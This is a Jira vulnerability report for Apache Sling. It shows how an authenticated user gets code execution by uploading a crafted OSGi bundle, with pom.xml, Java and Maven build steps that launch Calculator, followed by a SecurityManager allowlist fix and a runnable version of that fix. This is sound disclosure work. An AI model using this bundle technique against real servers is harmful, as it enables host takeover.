[
https://issues.apache.org/jira/browse/SLING-11658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
QSec-Team closed SLING-11658.
-----------------------------
> sling remote code execute
> -------------------------
>
> Key: SLING-11658
> URL: https://issues.apache.org/jira/browse/SLING-11658
> Project: Sling
> Issue Type: Bug
> Components: Console
> Affects Versions: App CMS 1.1.2
> Environment: OpenJDK Runtime Environment (Zulu
> 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
> Reporter: QSec-Team
> Priority: Major
> Attachments: 1.png, 2.png
>
>
> h1. Utilization process
>
> After logging in to Sling, in the OSGi management function, you can obtain host control by
> uploading the bundle component package.
> !1.png!
>
> After uploading the malicious bundle package constructed by the
> attacker, first click the "Refresh Package Imports" button, and then click the
> "start" button. This will trigger the bundle group price loading, and the
> malicious code will be executed.
> !2.png!
>
> h1. Jar package construction:
>
> Create a new Maven project and add the following compilation options in
> pom.xml:
> {code:xml}
> <build>
>   <plugins>
>     <plugin>
>       <groupId>org.apache.maven.plugins</groupId>
>       <artifactId>maven-assembly-plugin</artifactId>
>       <configuration>
>         <descriptorRefs>
>           <descriptorRef>jar-with-dependencies</descriptorRef>
>         </descriptorRefs>
>         <archive>
>           <manifestEntries>
>             <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
>             <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
>             <Bundle-Version>6.6.6</Bundle-Version>
>           </manifestEntries>
>         </archive>
>       </configuration>
>     </plugin>
>   </plugins>
> </build>
> {code}
> Create Main.java in the source code folder:
> Note that the "package jsx.ink;" in the source code should correspond to the
> Bundle-Activator attribute in pom.xml.
> {code:java}
> package jsx.ink;
>
> public class Main {
>     static {
>         try {
>             Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
>         } catch (Exception e) {
>         }
>     }
>
>     public static void main(String[] args) {
>         System.out.println("Hello world!");
>     }
> }
> {code}
> After the code is written, enter the directory where pom.xml is located and
> use the maven command to package:
> {code:java}
> mvn assembly:assembly -f pom.xml {code}
> h1. Repair
>
> You can use securityManager to restrict some operations.
> {code:java}
> import java.util.Arrays;
> import java.util.List;
>
> SecurityManager securityManager = new SecurityManager() {
>     @Override
>     public void checkExec(String cmd) {
>         // Each allowed command must be its own list element.
>         List<String> whiteList = Arrays.asList("whoami", "netstat");
>         if (!whiteList.contains(cmd)) {
>             throw new RuntimeException("command execute denied!");
>         }
>         super.checkExec(cmd);
>     }
> };
> System.setSecurityManager(securityManager);
> {code}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
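
The Repair suggestion above, worked into a runnable form as an added example (not code from the report or from the Sling project), assuming the Java 8 runtime named in the report's Environment field. `ExecAllowlistDemo` and `ExecAllowlistManager` are hypothetical names; the manager also refuses its own replacement, since an exec check that untrusted code can uninstall restricts nothing.

```java
import java.io.IOException;
import java.security.Permission;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
public class ExecAllowlistDemo {
    // Hypothetical manager: restricts process creation only, grants every other permission.
    static final class ExecAllowlistManager extends SecurityManager {
        private final Set<String> allowed;
        ExecAllowlistManager(String... commands) {
            allowed = new HashSet<>(Arrays.asList(commands));
        }

        @Override
        public void checkExec(String cmd) {
            // cmd is the program string as passed in, so "whoami" != "/usr/bin/whoami".
            if (!allowed.contains(cmd)) {
                throw new SecurityException("exec denied: " + cmd);
            }
        }

        @Override
        public void checkPermission(Permission perm) {
            // Lock the manager in place so System.setSecurityManager(null) cannot drop it.
            if (perm instanceof RuntimePermission && "setSecurityManager".equals(perm.getName())) {
                throw new SecurityException("security manager cannot be replaced");
            }
        }
    }

    static String tryExec(String... command) {
        try {
            new ProcessBuilder(command).start().destroy();
            return "started: " + command[0];
        } catch (SecurityException | IOException e) {
            return "refused: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        System.setSecurityManager(new ExecAllowlistManager("whoami", "netstat"));
        System.out.println(tryExec("whoami"));               // on the allowlist
        System.out.println(tryExec("/bin/sh", "-c", "id"));  // not on the allowlist
        try {
            System.setSecurityManager(null);
        } catch (SecurityException e) {
            System.out.println("refused: " + e.getMessage());
        }
    }
}
```

This manager grants every other permission, so it narrows process creation rather than sandboxing a hostile bundle. `SecurityManager` is deprecated for removal since Java 17 (JEP 411), and from Java 18 `System.setSecurityManager` throws `UnsupportedOperationException` unless the JVM is started with `-Djava.security.manager=allow`.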